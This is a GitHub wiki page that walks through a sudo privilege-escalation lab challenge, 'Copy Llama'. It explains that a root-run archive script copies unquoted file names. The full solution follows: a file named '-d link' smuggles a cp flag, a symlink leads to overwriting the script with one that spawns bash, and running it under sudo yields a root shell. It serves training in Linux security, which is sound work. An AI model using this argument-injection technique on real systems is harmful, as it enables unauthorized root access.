-
Notifications
You must be signed in to change notification settings - Fork 2
Challenge 19: Copy Llama
Bob Micheletto edited this page Feb 20, 2023
·
1 revision
Level: Hard
Sudo Rule: localuser19 ALL=(ALL) NOPASSWD: /usr/local/bin/dir_archive.sh
Notes: This is variations on the copy theme take V. A technique similar to challenge 3 is required to make it work, with some additional steps to get the command line flags into place.
The exploit is possible because the shell script does not escape file names here:
for F in * ; do
/bin/cp $F /archives/${DIR}
done
That $F is unescaped input from the file names in the current working directory. Files can be created that contain the flags, spaces, and filenames we need to repeat the exploit from Challenge 3.
Yes, sudo /usr/local/bin/dir_archive.sh has to be run twice.
Solution:
sudo -l
cat /usr/local/bin/dir_archive.sh
mkdir /tmp/files
cd /tmp/files
ln -s /usr/local/bin/dir_archive.sh link
cp --help
touch ./'-d link'
sudo /usr/local/bin/dir_archive.sh
ls -l /archives/file/link
rm ./'-d link'
rm link
cat > link <<EOF
#!/bin/sh
/bin/bash
EOF
sudo /usr/local/bin/dir_archive.sh
sudo /usr/local/bin/dir_archive.sh
id